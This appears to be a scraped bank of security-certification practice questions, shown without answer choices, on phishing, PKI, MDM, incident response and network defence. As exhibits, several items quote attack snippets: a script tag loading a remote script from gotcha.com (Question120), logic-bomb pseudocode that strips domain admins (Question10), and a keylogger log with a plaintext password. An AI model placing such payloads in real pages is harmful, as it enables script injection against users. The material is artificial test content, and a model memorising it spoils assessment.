EMT Practice Test

1. Question Content...


Question List

Question1: A company help desk as received several reports that employees have experienced identify theft and compromised accounts. This occurred several days after receiving an email asking them to update their personal bank information. Which of the following is a vulnerability that has been exploited?

Question2: A security engineer wants to further secure a sensitive VLAN on the network by introducing MFA.
Which of the following is the BEST example of this?

Question3: A security operations team recently detected a breach of credentials. The team mitigated the risk and followed proper processes to reduce risk. Which of the following processes would BEST help prevent this issue from happening again?

Question4: In the event of a security incident, which of the following should be captured FIRST?

Question5: A company has purchased a new SaaS application and is in the process of configuring it to meet the company's needs. The director of security has requested that the SaaS application be integrated into the company's IAM processes. Which of the following configurations should the security administrator set up in order to complete this request?

Question6: An email systems administrator is configuring the mail server to prevent spear phishing attacks through email messages. Which of the following refers to what the administrator is doing?

Question7: An attacker has gained control of several systems on the Internet and is using them to attach a website, causing it to stop responding to legitimate traffic Which of the following BEST describes the attack?

Question8: Two companies are enabling TLS on their respective email gateways to secure communications over the Internet. Which of the following cryptography concepts is being implemented?

Question9: A security administrator has created a new group policy object that utilizes the trusted platform module to compute a hash of system files and compare the value to a known-good value. Which of the following security concepts is this an example of?

Question10: A security administrator found the following piece of code referenced on a domain controller's task scheduler:
$var = GetDomainAdmins If $var != 'fabio' SetDomainAdmins = NULL
With which of the following types of malware is the code associated?

Question11: A technician has been asked to document which services are running on each of a collection of 200 servers. Which of the following tools BEST meets this need while minimizing the work required?

Question12: After discovering a buffer overflow vulnerability an application the security analyst needs to report it to the development team leader. Which of the following are MOST to appear m the impact section of the report? (Select TWO).

Question13: A transitive trust:

Question14: Which of the following algorithms would be used to provide non-repudiation of a file transmission?

Question15: A member of the IR team has identified an infected computer Which of the following IR phases should the team member conduct NEXT?

Question16: A systems administrator has installed a new UTM that is capable of inspecting SSL/TLS traffic for malicious payloads. All inbound network traffic coming from the Internet and terminating on the company's secure web servers must be inspected. Which of the following configurations would BEST support this requirement?

Question17: SIMULATION
Select the appropriate attack and remediation from each drop-down list to label the corresponding attack with its remediation.
INSTRUCTIONS
Not all attacks and remediation actions will be used. If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Question18: Leveraging the information supplied below, complete the CSR for the server to set up TLS (HTTPS)
* Hostname: ws01
* Domain: comptia.org
* IPv4: 10.1.9.50
* IPV4: 10.2.10.50
* Root: home.aspx
* DNS CNAME:homesite.
Instructions:
Drag the various data points to the correct locations within the CSR. Extension criteria belong in the let hand column and values belong in the corresponding row in the right hand column.

Question19: A security administrator is creating a risk assessment on BYOD. One of the requirements of the risk assessment is to address the following
* Centrally managing mobile devices
* Data loss prevention
Which of the following recommendations should the administrator include in the assessment? (Select TWO).

Question20: A company has had a BYOD policy in place for many years and now wants to roll out an MDM solution. The company has decided that end users who wish to utilize their personal devices for corporate use must opt in to the MDM solution. End users are voicing concerns about the company having access to their personal devices via the MDM solution. Which of the following should the company implement to ease these concerns?

Question21: If two employees are encrypting traffic between them using a single encryption key, which of the following algorithms are they using?

Question22: Using a one-time code that has been texted to a smartphone is an example of:

Question23: A security analyst is investigating a security breach involving the loss of sensitive dat a. A user passed the information through social media as vacation photos. Which of the following methods was used to encode the data?

Question24: In which of the following risk management strategies would cybersecurity insurance be used?

Question25: A company network is currently under attack. Although security controls are in place to stop the attack, the security administrator needs more information about the types of attacks being used. Which of the following network types would BEST help the administrator gather this information?

Question26: When an initialization vector is added to each encryption cycle, it is using the:

Question27: A company wants to deploy PKI on its Internet-facing website. The applications that are currently deployed are:
* www company com (mam website)
* contactus company com (for locating a nearby location)
* quotes company com (for requesting a price quote)
The company wants to purchase one SSL certificate that will work for all the existing applications and any future applications that follow the same naming conventions, such as store company com. Which of the following certificate types would BEST meet the requirements?

Question28: A security administrator suspects there may be unnecessary services running on a server. Which of the following tools will the administrator MOST likely use to confirm the suspicions?

Question29: A security analyst recommends implementing SSL for an existing web service. A technician installs the SSL certificate and successfully tests the connection on the server Soon after, the help desk begins receiving calls from users who are unable to log in After further investigation, it becomes clear that no users have successfully logged in since the certificate installation. Which of the following is MOST likely the issue?

Question30: During a forensic investigation, which of the following must be addressed FIRST according to the order of volatility?

Question31: An analyst is currently looking at the following output:

Which of the following security issues has been discovered based on the output?

Question32: A user loses a COPE device. Which of the following should the user do NEXT to protect the data on the device?

Question33: A Chief Information Security Officer (CISO) asks the security architect to design a method for contractors to access the company's internal network securely without allowing access to systems beyond the scope of their project. Which of the following methods would BEST fit the needs of the CISO?

Question34: A restaurant wants to deploy tablets to all waitstaff but does not want to use passwords or manage users to connect the tablets to the network. Which of the following types of authentication would be BEST suited for this scenario?

Question35: A critical enterprise component whose loss or destruction would significantly impede business operations or have an outsized impact on corporate revenue is known as:

Question36: A security analyst runs a monthly file integrity check on the main web server. When analyzing the logs, the analyst observed the following entry:

No OS patches were applied to this server during this period. Considering the log output, which of the following is the BEST conclusion?

Question37: A company is deploying a wireless network. It is a requirement that client devices must use X.509 certifications to mutually authenticate before connecting to the wireless network. Which of the following protocols would be required to accomplish this?

Question38: A government contracting company Issues smartphones lo employees lo enable access lo corporate resources. Several employees will need to travel to a foreign country (or business purposes and will require access lo their phones. However, the company recently received intelligence that its intellectual property is highly desired by the same country's government. Which of the following MDM configurations would BEST reduce the risk of compromise while on foreign soil?

Question39: Which of the following models is considered an iterative approach with frequent testing?

Question40: The security office has had reports of increased tailgating in the datacenter. Which of the following controls should security put in place?

Question41: Which of the following agreement types is a non-contractual agreement between two or more parties and outlines each party's requirements and responsibilities?

Question42: After entering a username and password, an administrator must draw a gesture on a touch screen. Which of the following demonstrates what the administrator is providing?

Question43: Which of the following involves the use of targeted and highly crafted custom attacks against a population of users who may have access to a particular service or program?

Question44: A government agency with sensitive information wants to virtualize its infrastructure. Which of the following cloud deployment models BEST fits the agency's needs?

Question45: Given the following output:
Which of the following BEST describes the scanned environment?

Question46: Which of the following is a component of multifactor authentication?

Question47: A company recently contracted a penetration testing firm to conduct an assessment. During the assessment, the penetration testers were able to capture unencrypted communication between directory servers. The penetration testers recommended encrypting this communication to fix the vulnerability. Which of the following protocols should the company implement to close this finding?

Question48: An organization discovers that unauthorized applications have been installed on company-provided mobile phones. The organization issues these devices, but some users have managed to bypass the security controls. Which of the following Is the MOST likely issue, and how can the organization BEST prevent this from happening?

Question49: An organization has decided to host its web application and database in the cloud. Which of the following BEST describes the security concerns for this decision?

Question50: A large Industrial system's smart generator monitors the system status and sends alerts to third-party maintenance personnel when critical failures occur. While reviewing the network logs, the company's security manager notices the generator's IP is sending packets to an internal file server's IP. Which of the following mitigations would be BEST for the security manager to implement while maintaining alerting capabilities?

Question51: Which of the following types of security testing is the MOST cost-effective approach used to analyze existing code and identity areas that require patching?

Question52: A company uses WPA2-PSK. and it appears there are multiple unauthorized devices connected to the wireless network A technician suspects this is because the wireless password has been shared with unauthorized individuals. Which of the following should the technician implement to BEST reduce the risk of this happening in the future?

Question53: A newly hired Chief Security Officer (CSO) is reviewing the company's IRP and notices the procedures for zero-day malware attacks are being poorly executed, resulting m the CSIRT failing to address and coordinate malware removal from the system. Which of the following phases would BEST address these shortcomings?

Question54: Which of the following BEST describes why an air gap is a useful security control?

Question55: A security analyst is asked to check the configuration of the company's DNS service on the server. Which of the following command line tools should the analyst use to perform the Initial assessment?

Question56: A systems administrator is implementing a remote access method for the system that will utilize GUI. Which of the following protocols would be BEST suited for this?

Question57: A manufacturer creates designs for very high security products that are required to be protected and controlled by government regulations. These designs are not accessible by corporate networks or the Internet. Which of the following is the BEST solution to protect these designs?

Question58: A security administrator is implementing a SIEM and needs to ensure events can be compared against each other based on when the events occurred and were collected. Which of the following does the administrator need to implement to ensure this can be accomplished?

Question59: A critical web application experiences slow response times during the end of a company's fiscal year. This web application typically sees a 35% increase in utilization during this time. The Chief Information Officer (CIO) wants an automated solution in place to deal with the annual spike. Which of the following does the CIO MOST likely want to implement?

Question60: A systems administrator is receiving multiple alerts from the company NIPS. A review of the NIPS logs shows the following:
reset both: 70.32.200.2:3194 -> 10.4.100.4:80 buffer overflow attempt
reset both: 70.32.200.2:3230 -> 10.4.100.4:80 directory traversal attack reset client: 70.32.200.2:4019 -> 10.4.100.4:80 Blind SQL injection attack Which of the following should the systems administrator report back to management?

Question61: A technician is implementing 802 1X with dynamic VLAN assignment based on a user Active Directory group membership Which of the following configurations supports the VLAN definitions?

Question62: A user wants to send a confidential message to a customer to ensure unauthorized users cannot access the information. Which of the following can be used to ensure the security of the document while in transit and at rest?

Question63: A buffer overflow can result in:

Question64: Which of the following would MOST likely support the integrity of a voting machine?

Question65: The application team within a company is asking the security team to investigate why its application is slow after an upgrade. The source of the team's application is 10.13.136.9. and the destination IP is 10.17.36.5. The security analyst pulls the logs from the endpoint security software but sees nothing is being blocked. The analyst then looks at the UTM firewall logs and sees the following:

Which of the following should the security analyst request NEXT based on the UTM firewall analysis?

Question66: Joe recently assumed the role of data custodian for this organization. While cleaning out an unused storage safe, he discovers several hard drives that are labeled "unclassified" and awaiting destruction. The hard drives are obsolete and cannot be installed in any of his current computing equipment. Which of the following is the BEST method for disposing of the hard drives?

Question67: Ann. a user, reports she is receiving emails that appear to be from organizations to which she belong. Put me emails contain links to websites that do not belong to those organizations. Which of the following security scenarios does this describe?

Question68: An organization has hired a security analyst to perform a penetration test. The analyst captures 1GB worth of inbound network traffic to the server and transfers the pcap back to the machine for analysis. Which of the following tools should the analyst use to future review the pcap?

Question69: A technician is designing a solution that will be required to process sensitive information, including classified government dat a. The system needs to be common criteria certified. Which of the following should the technician select?

Question70: In a lessons learned report, it is suspected that a well-organized, well-funded, and extremely sophisticated group of attackers may have been responsible for a breach at a nuclear facility.
Which of the following describes the type of actors that may have been implicated?

Question71: An organization prefers to apply account permissions to groups and not individual users, but allows for exceptions that are justified. Some systems require a machine-to-machine data exchange and an associated account to perform this data exchange. One particular system has data in a folder that must be modified by another system. No user requires access to this folder; only the other system needs access to this folder. Which of the following is the BEST account management practice?

Question72: A company wants to ensure confidential data from storage media is sanitized in such a way that the drive cannot be reused. Which of the following methods should the technician use?
Shredding

Question73: A security analyst is using a recently released security advisory to review historical logs, looking for the specific activity that was outlined in the advisory. Which of the following is the analyst doing?

Question74: Which of the following may indicate a configuration item has reached end-of-life?

Question75: Which of the following is MOST likely the security impact of continuing to operate end-of-life systems?

Question76: The CSIRT is reviewing the lessons learned from a recent incident A worm was able to spread unhindered throughout the network and infect a large number of computers and servers. Which of the following recommendations would be BEST to mitigate the impacts of a similar incident in the future?

Question77: A security team has downloaded a public database of the largest collection of password dumps on the Internet. This collection contains the cleartext credentials of every major breach for the last four years. The security team pulls and compares users' credentials to the database and discovers that more than 30% of the users were still using passwords discovered in this list. Which of the following would be the BEST combination to reduce the risks discovered?

Question78: A security administrator in a bank is required to enforce an access control policy so no single individual is allowed to both initiate and approve financial transactions. Which of the following BEST represents the impact the administrator is deterring?

Question79: While testing a new vulnerability scanner, a technician becomes concerned about reports that list security concerns that are not present on the systems being tested. Which of the following BEST describes this flaw?

Question80: The Chief Information Officer (CIO) has heard concerns from the business and the help desk about frequent user account lockouts Which of the following account management practices should be modified to ease the burden?

Question81: Confidential corporate data was recently stolen by an attacker who exploited data transport protections. Which of the following vulnerabilities is the MOST likely cause of this data breach?

Question82: Which of the following BEST explains why sandboxing is a best practice for testing software from an untrusted vendor prior to an enterprise deployment?

Question83: After a systems administrator installed and configured Kerberos services, several users experienced authentication issues. Which of the following should be installed to resolve these issues?

Question84: An Organization requires secure configuration baselines for all platforms and technologies that are used. If any system cannot conform to the secure baseline, the organization must process a risk acceptance and receive approval before the system is placed into production. It may have non-conforming systems in its lower environments (development and staging) without risk acceptance, but must receive risk approval before the system is placed in production. Weekly scan reports identify systems that do not conform to any secure baseline.
The application team receive a report with the following results:
There are currently no risk acceptances for baseline deviations. This is a mission-critical application, and the organization cannot operate If the application is not running. The application fully functions in the development and staging environments. Which of the following actions should the application team take?

Question85: An organization has decided to purchase an insurance policy because a risk assessment determined that the cost to remediate the risk Is greater than the five-year cost of the insurance policy. The organization is enabling risk:

Question86: An organization uses an antivirus scanner from Company A on its firewall, an email system antivirus scanner from Company B and an endpoint antivirus scanner from Company C.
This is an example of:

Question87: A network administrator has been asked to install an IDS to improve the security posture of an organization. Which of the following control types Is an IDS?

Question88: A systems administrator needs to integrate multiple loT and small embedded devices into the company's wireless network securely Witch of the following should the administrator implement to ensure low-power and legacy devices can connect to the wireless network?

Question89: You have been tasked with designing a security plan for your company. Drag and drop the appropriate security controls on the floor plan.
Instructions: All objects must be used and all place holders must be filled. Order does not matter. When you have completed the simulation, please select the Done button to submit.

Question90: A network administrator was recently terminated. A few weeks later, the new administrator noticed unauthorized changes to several devices that are causing denial of services. Additionally, the administrator noticed an unusual connection from an external IP address to an internal server. Which of the following is the MOST likely cause of the problem?

Question91: A company is having Issues with intellectual property being sent to a competitor from its system. The information being sent Is not random but has an identifiable pattern. Which of the following should be implemented in the system to stop the content from being sent?

Question92: An Organization wants to separate permissions for individuals who perform system changes from individuals who perform auditing of those system changes. Which of the following access control approaches is BEST suited for this?

Question93: A systems administrator wants to replace the process of using a CRL to verify certificate validity. Frequent downloads are becoming problematic. Which of the following would BEST suit the administrator's needs?

Question94: Which of the following impacts MOST likely results from poor exception handling?

Question95: A company just implemented a new telework policy that allows employees to use personal devices for official email and file sharing while working from home. Some of the requirements are:
* Employees must provide an alternate work location (i.e., a home address).
* Employees must install software on the device that will prevent the loss of proprietary data but will not restrict any other software from being installed.
Which of the following BEST describes the MDM options the company is using?

Question96: A security analyst is assessing a small company's internal servers against recommended security practices. Which of the following should the analyst do to conduct the assessment? (Select TWO).

Question97: The Chief Information Security Officer (CISO) at a large company tasks a security administrator to provide additional validation for website customers. Which of the following should the security administrator implement?

Question98: A system uses an application server and database server Employing the principle of least privilege, only database administrators are given administrative privileges on the database server, and only application team members are given administrative privileges on the application server. Audit and log file reviews are performed by the business unit (a separate group from the database and application teams).
The organization wants to optimize operational efficiency when application or database changes are needed, but it also wants to enforce least privilege, prevent modification of log files, and facilitate the audit and log review performed by the business unit. Which of the following approaches would BEST meet the organization's goals?

Question99: A systems administrator recently issued a public/private key pair that will be used for the company's DNSSEC implementation Which of the following configurations should the systems administrator implement NEXT?

Question100: A company's IT staff is given the task of securely disposing of 100 server HDDs. The security team informs the IT staff that the data must not be accessible by a third party after disposal. Which of the following is the MOST time-efficient method to achieve this goal?

Question101: A network technician is setting up a new branch for a company. The users at the new branch will need to access resources securely as if they were at 'the main location. Which of the following networking concepts would BEST accomplish this'?

Question102: A security analyst is specifying requirements for a wireless network. The analyst must explain the security features provided by various architecture choices.
Which of the following is provided by PEAP, EAP-TLS, and EAP-TTLS?

Question103: An Organization requires secure configuration baselines for all platforms and technologies that are used. If any system cannot conform to the secure baseline, the organization must process a risk acceptance and receive approval before the system is placed into production. It may have non-conforming systems in its lower environments (development and staging) without risk acceptance, but must receive risk approval before the system is placed in production. Weekly scan reports identify systems that do not conform to any secure baseline.
The application team receive a report with the following results:

There are currently no risk acceptances for baseline deviations. This is a mission-critical application, and the organization cannot operate If the application is not running. The application fully functions in the development and staging environments. Which of the following actions should the application team take?

Question104: A systems administrator has created network file shares for each department with associated security groups for each role within the organization. Which of the following security concepts is the systems administrator implementing?

Question105: Which of the following is unique to a stream cipher?

Question106: The web platform team is deploying a new web application During testing, the team notices the web application is unable to create a TLS connection to the API gateway. The administrator created a firewall rule that permit TLS traffic from the web application server to the API gateway. However, the firewall logs show all traffic is being dropped. Which of the following is MOST likely causing the issue'

Question107: An organization wishes to allow its users to select devices for business use but does not want to overwhelm the service desk with requests for too many different device types and models. Which of the following deployment models should the organization use to BEST meet these requirements?

Question108: A network engineer needs to allow an organization's users to conned their laptops to wired and wireless networks from multiple locations and facilities, while preventing unauthorized connections to the corporate networks. Which of the following should be Implemented to fulfill the engineer's requirements?

Question109: During an audit, the auditor requests to see a copy of the identified mission-critical applications as well as their disaster recovery plans. The company being audited has an SLA around the applications it hosts. With which of the following is the auditor MOST likely concerned?

Question110: A company that processes sensitive information has implemented a BYOD policy and an MDM solution to secure sensitive data that is processed by corporate and personally owned mobile devices. Which of the following should the company implement to prevent sensitive data from being stored on mobile devices?

Question111: During certain vulnerability scanning scenarios, It is possible for the target system to react in unexpected ways. This type of scenario is MOST commonly known as:

Question112: A network administrator needs 10 prevent users from accessing the accounting department records. All users are connected to the same Layer 2 device and access the internal through the same router. Which of the following should be Implemented to segment me accounting department from the rest of the users?

Question113: Which of the following BEST explains the difference between a credentialed scan and a non-credentialed scan?

Question114: Which of the following BEST explains how the use of configuration templates reduces organization risk?

Question115: For each of the given items, select the appropriate authentication category from the drop down choices.
Select the appropriate authentication type for the following items:

Question116: A new PKI is being bum at a company, but the network administrator has concerns about spikes of traffic occurring twice a flay due to clients checking the status of the certificates. Which of the following should be implemented to reduce the spikes in traffic?

Question117: Using an ROT13 cipher to protocol confidential information for unauthorized access is known as:

Question118: A Chief Information Security Officer (CISO) is performing a BIA for the organization in case of a natural disaster. Which of the following should be at the top of the CISO's list?

Question119: Which of the following implements a stream cipher?

Question120: A security engineer is analyzing the following line of JavaScript code that was found in a comment field on a web forum, which was recently involved in a security breach:
<script src=http://gotcha.com/hackme.js></script>
Given the line of code above, which of the following BEST represents the attack performed during the breach?

Question121: Users are attempting to access a company's website but are transparently redirected to another website. The users confirm the URL is correct. Which of the following would BEST prevent this issue in the future?

Question122: In which of the following situations would it be BEST to use a detective control type for mitigation?

Question123: An employee opens a web browser and types a URL into the address bar. Instead of reaching the requested site, the browser opens a completely different site. Which of the following types of attacks have MOST likely occurred? (Choose two.)

Question124: An administrator is beginning an authorized penetration test of a corporate network. Which of the following tools would BEST assist in identifying potential attacks?

Question125: A security engineer wants to add SSL to the public web server. Which of the following would be the FIRST step to implement the SSL certificate?

Question126: Which of the following would have the GREATEST impact on the supporting, database server if input handling is not properly implemented on a web application?

Question127: A company wants to configure its wireless network to require username and password authentication. Which of the following should the systems administrator Implement?

Question128: A security engineer is setting up passwordless authentication for the first time.
INSTRUCTIONS
Use the minimum set of commands to set this up and verify that it works. Commands cannot be reused.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Question129: Which of the following implements two-factor authentication on a VPN?

Question130: Which of the following is a passive method to test whether transport encryption is implemented?

Question131: A preventive control differs from a compensating control in that a preventive control is:

Question132: An attacker is able to capture the payload for the following packet:
IP 192.168.1.22:2020 10.10.10.5:443
IP 192.166.1.10:1030 10.10.10.1:21
IP 192.168.1.57:5217 10.10.10.1:3389
During an investigation, an analyst discovers that the attacker was able to capture the information above and use it to log on to other servers across the company. Which of the following is the MOST likely reason?

Question133: The network information for a workstation is as follows:

When the workstation's user attempts to access www.example.com. the URL that actually opens is www.notexample.com. The user successfully connects to several other legitimate URLs. Which of the following have MOST likely occurred? (Select TWO).

Question134: A security administrator is Implementing a secure method that allows developers to place files or objects onto a Linux server Developers ate required to log In using a username. password, and asymmetric key. Which of the following protocols should be implemented?

Question135: A retail executive recently accepted a job with a major competitor. The following week, a security analyst reviews the security logs and Identifies successful logon attempts to access the departed executive's accounts. Which of the following security practices would have addressed the issue?

Question136: A technician is evaluating a security appliance solution. The company needs a system that continues to pass traffic if the system crashes. Which of the following appliance feature would BEST meet the company's needs?

Question137: A company is looking for an all-in-one solution to provide identification authentication, authorization, and accounting services. Which of the following technologies should the company use?

Question138: Which of the following is the BEST example of a reputation impact identified during a risk assessment?

Question139: Joe, an employee, asks a coworker how long ago Ann started working at the help desk. The coworker expresses surprise since nobody named Ann works at the help desk. Joe mentions that Ann called several people in the customer service department 10 help reset their passwords over the phone due to unspecified "server issues.' Which of the following has occurred?

Question140: A company utilizes 802.11 for all client connectivity within a facility. Users in one part of the building are reporting they are unable to access company resources when connected to the company SSID. Which of the following should the security administrator use to assess connectivity?

Question141: The help desk received a call from a user who was trying to access a set of files from the day before but received the following error message: File format not recognized. Which of the following types of malware MOST likely caused this to occur?

Question142: An attacker has recently compromised an executives laptop and installed a RAT. The attacker used a registry key to ensure the RAT starts every time the laptop Is powered on. Of which of the following is this an example?

Question143: Which of the following has the potential to create a DoS attack on a system?

Question144: Several systems and network administrators are determining how to manage access to a facility and enable managers to allow after-hours access. Which of the following access control methods should managers use to assign after-hours access to the employees?

Question145: Which of the following is MOST likely caused by improper input handling?

Question146: A userreceived an SMS on a mobile phone that asked for bank details. Which of the following social-engineering techniques was used in this case?

Question147: Staff members of an organization received an email message from the Chief Executive Officer (CEO) asking them for an urgent meeting in the main conference room. When the staff assembled, they learned the message received was not actually from the CEO. Which of the following BEST represents what happened?

Question148: An organization wants to set up a wireless network in the most secure way. Budget is not a major consideration, and the organization is willing to accept some complexity when clients are connecting. It is also willing to deny wireless connectivity for clients who cannot be connected in the most secure manner. Which of the following would be the MOST secure setup that conforms to the organization's requirements?

Question149: SIMULATION
You have just received some room and WiFi access control recommendations from a security consulting company. Click on each building to bring up available security controls. Please implement the following requirements:
The Chief Executive Officer's (CEO) office had multiple redundant security measures installed on the door to the office. Remove unnecessary redundancies to deploy three-factor authentication, while retaining the expensive iris render.
The Public Cafe has wireless available to customers. You need to secure the WAP with WPA and place a passphrase on the customer receipts.
In the Data Center you need to include authentication from the "something you know" category and take advantage of the existing smartcard reader on the door.
In the Help Desk Office, you need to require single factor authentication through the use of physical tokens given to guests by the receptionist.
The PII Office has redundant security measures in place. You need to eliminate the redundancy while maintaining three-factor authentication and retaining the more expensive controls.

Instructions: The original security controls for each office can be reset at any time by selecting the Reset button. Once you have met the above requirements for each office, select the Save button. When you have completed the entire simulation, please select the Done button to submit. Once the simulation is submitted, please select the Next button to continue.




Question150: A security administrator is investigating a possible account compromise. The administrator logs onto a desktop computer, executes the command notepad.exe c:\Temp\qkakforlkgfkja.1og, and reviews the following:
Lee,\rI have completed the task that was assigned to me\rrespectfully\rJohn\r
https://www.portal.com\rjohnuser\rilovemycat2
Given the above output, which of the following is the MOST likely cause of this compromise?

Question151: An engineer is configuring a wireless network using PEAP for the authentication protocol. Which of the following is required?

Question152: Which of the following BEST explains the reason why a server administrator would place a document named password.txt on the desktop of an administrator account on a server?

Question153: During an incident, a company's CIRT determines it is necessary to observe the continued network-based transactions between a callback domain and the malware running on an enterprise PC. Which of the following techniques would be BEST to enable this activity while reducing the risk of lateral spread and the risk that the adversary would notice any changes?

Question154: A malicious actor compromises a legitimate website, configuring it to deliver malware to visitors of the website. Which of the following attacks does this describe?

Question155: A corporation wants to allow users who work for its affiliate companies to sign on to each other's wireless network with their own company's credentials. Which of the following architectures would support this requirement?

Question156: If a current private key is compromised, which of the following would ensure it cannot be used to decrypt all historical data?

Question157: A company is planning to utilize its legacy desktop systems by converting them into dummy terminals and moving all heavy applications and storage to a centralized server that hosts all of the company's required desktop applications. Which of the following describes the BEST deployment method to meet these requirements?

Question158: Which of the following BEST explains why a development environment should have the same database server secure baseline that exists in production even if there is no PII in the database?

Question159: An application developer is working on a new calendar and scheduling application. The developer wants to test new functionality that is time/date dependent and set the local system time to one year in the future. The application also has a feature that uses SHA-256 hashing and AES encryption for data exchange. The application attempts to connect to a separate remote server using SSL, but the connection fails. Which of the following is the MOST likely cause and next step?

Question160: A security analyst needs a solution that can execute potential malware in a restricted and isolated environment for analysis. In which of the following technologies is the analyst interested?

Question161: A developer is creating a new web application on a public cloud platform and wants to ensure the application can respond to increase in load while minimizing costs during periods of low usage. Which of the following strategies is MOST relevant to the use-case?

Question162: An incident response analyst in a corporate security operations center receives a phone call from an SOC analyst. The SOC analyst explains the help desk recently reimaged a workstation that was suspected of being infected with an unknown type of malware; however, even after reimaging, the host continued to generate SIEM alerts. Which of the following types of malware is MOST likely responsible for producing the SIEM alerts?

Question163: An authorized user is conducting a penetration scan of a system for an organization. The tester has a set of network diagrams. Source code, version numbers of applications. and other information about the system. Including hostnames and network addresses. Which of the following BEST describes this type of penetration test?

Question164: Which of the following serves to warn users against downloading and installing pirated software on company devices?

Question165: While monitoring the SIEM, a security analyst observes traffic from an external IP to an IP address of the business network on port 443. Which of the following protocols would MOST likely cause this traffic?

Question166: Moving laterally within a network once an initial exploit is used to gain persistent access for the purpose of establishing further control of a system is known as:

Question167: A Chief Information Security Officer (CISO) for a school district wants to enable SSL to protect all of the public-facing servers in the domain. Which of the following is a secure solution that is the MOST cost effective?

Question168: Penetration testing is distinct from vulnerability scanning primarily because penetration testing:

Question169: An organization requires two separate factors as part of an authentication scheme. One of those factors is a password. Which of the following would BEST meet me requirement for the other factor?

Question170: An attacker has gathered information about a company employee by obtaining publicly available information from the Internet and social networks. Which of the following types of activity is the attacker performing?

Question171: Which of the following attacks can be mitigated by proper data retention policies?

Question172: Company engineers regularly participate in a public Internet forum with other engineers throughout the industry. Which of the following tactics would an attacker MOST likely use in this scenario?

Question173: During a network assessment a security analyst identifies that most of the egress traffic is related to port 443. The company is interested in identifying the content of this traffic, as allowed by the corporate policy. Which of the following technologies should the security analyst deploy?

Question174: Fuzzing is used to reveal which of the following vulnerabilities in web applications?

Question175: Task: Configure the firewall (fill out the table) to allow these four rules:
Only allow the Accounting computer to have HTTPS access to the Administrative server.
Only allow the HR computer to be able to communicate with the Server 2 System over SCP.
Allow the IT computer to have access to both the Administrative Server 1 and Administrative Server 2

Question176: An administrator is setting up automated remote file transfers to another organization. The other organization has the following requirements for the connection protocol:
* Encryption in transit is required.
* Mutual authentication must be used.
* Certificate authentication must be used (no passwords).
Which of the following should the administrator choose?

Question177: Which of the following attacks is used to capture the WPA2 handshake?

Question178: A computer forensics analyst collected a flash drive that contained a single file with 500 pages of text. Which of the following algorithms should the analyst use to validate the integrity of the file?

Question179: An analyst is concerned about data leaks and wants to restrict access to Internet services to authorized users only. The analyst also wants to control the actions each user can perform on each service Which of the following would be the BEST technology for me analyst to consider implementing?

Question180: An analyst generates the following color-coded table shown in the exhibit to help explain the risk of potential incidents in the company. The vertical axis indicates the likelihood or an incident, while the horizontal axis indicates the impact.

Which of the following is this table an example of?

Question181: A security administrator plans to conduct a vulnerability scan on the network to determine if system applications are up to date. The administrator wants to limit disruptions to operations but not consume too many resources. Which of the following types of vulnerability scans should be conducted?

Question182: An internal intranet site is required to authenticate users and restrict access to content to only those who are authorized to view it The site administrator previously encountered issues with credential spoofing when using the default NTLM setting and wants to move to a system that will be more resilient to replay attacks Which of the following should the administrator implement?

Question183: Which of the following Is a resiliency strategy that allows a system to automatically adapt to workload changes?

Question184: To reduce costs and overhead, an organization wants to move from an on-premises email solution to a cloud-based email solution. At this time, no other services will be moving. Which of the following cloud models would BEST meet the needs of the organization?

Question185: A cybersecurity analyst needs to Implement secure authentication to third-party websites without users' passwords Which of the following would be the BEST way to achieve this objective?

Question186: SIMULATION
A security administrator discovers that an attack has been completed against a node on the corporate network. All available logs were collected and stored.
You must review all network logs to discover the scope of the attack, check the box of the node(s) that have been compromised and drag and drop the appropriate actions to complete the incident response on the network. The environment is a critical production environment; perform the LEAST disruptive actions on the network, while still performing the appropriate incid3nt responses.
Instructions: The web server, database server, IDS, and User PC are clickable. Check the box of the node(s) that have been compromised and drag and drop the appropriate actions to complete the incident response on the network. Not all actions may be used, and order is not important. If at any time you would like to bring back the initial state of the simulation, please select the Reset button. When you have completed the simulation, please select the Done button to submit. Once the simulation is submitted, please select the Next button to continue.

Question187: A security analyst is interested in setting up an IDS to monitor the company network. The analyst has been told there can be no network downtime to implement the solution, but the IDS must capture all of the network traffic. Which of the following should be used for the IDS implementation?

Question188: An attack has occurred against a company.
INSTRUCTIONS
You have been tasked to do the following:
Identify the type of attack that is occurring on the network by clicking on the attacker's tablet and reviewing the output. (Answer Area 1) Identify which compensating controls should be implemented on the assets, in order to reduce the effectiveness of future attacks by dragging them to the correct server. (Answer area 2) All objects will be used, but not all placeholders may be filled. Objects may only be used once.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.



Question189: After a ransomware attack. a forensics company needs to review a cryptocurrency transaction between the victim and the attacker. Which of the following will the company MOST likely review to trace this transaction?

Question190: A systems administrator needs to configure an SSL remote access VPN according to the following organizational guidelines:
* The VPN must support encryption of header and payload.
* The VPN must route all traffic through the company's gateway.
Which of the following should be configured on the VPN concentrator?

Question191: A coffee company has hired an IT consultant to set up a WiFi network that will provide Internet access to customers who visit the company's chain of cafes. The coffee company has provided no requirements other than that customers should be granted access after registering via a web form and accepting the terms of service. Which of the following is the MINIMUM acceptable configuration to meet this single requirement?

Question192: A security analyst has recently deployed an MDM solution that requires biometric authentication for company-issued smartphones As the solution was implemented the help desk has seen a dramatic increase in calls by employees frustrated that company-issued phones take several attempts to unlock using the fingerprint scanner Which of the following should be reviewed to mitigate this problem?

Question193: An organization requires three separate factors for authentication to sensitive systems. Which of the following would BEST satisfy the requirement?

Question194: An organization is concerned that Its hosted web servers are not running the most updated version of the software. Which of the following would work BEST to help identify potential vulnerabilities?

Question195: A security team has completed the installation of a new server. The OS and applications have been patched and tested, and the server is ready to be deployed. Which of the following actions should be taken before deploying the new server?

Question196: A technician is required to configure updates on a guest operating system while maintaining the ability to quickly revert the changes that were made while testing the updates. Which of the following should the technician implement?

Question197: A company needs to fix some audit findings related to its physical security. A key finding was that multiple people could physically enter a location at the same time. Which of the following is the BEST control to address this audit finding?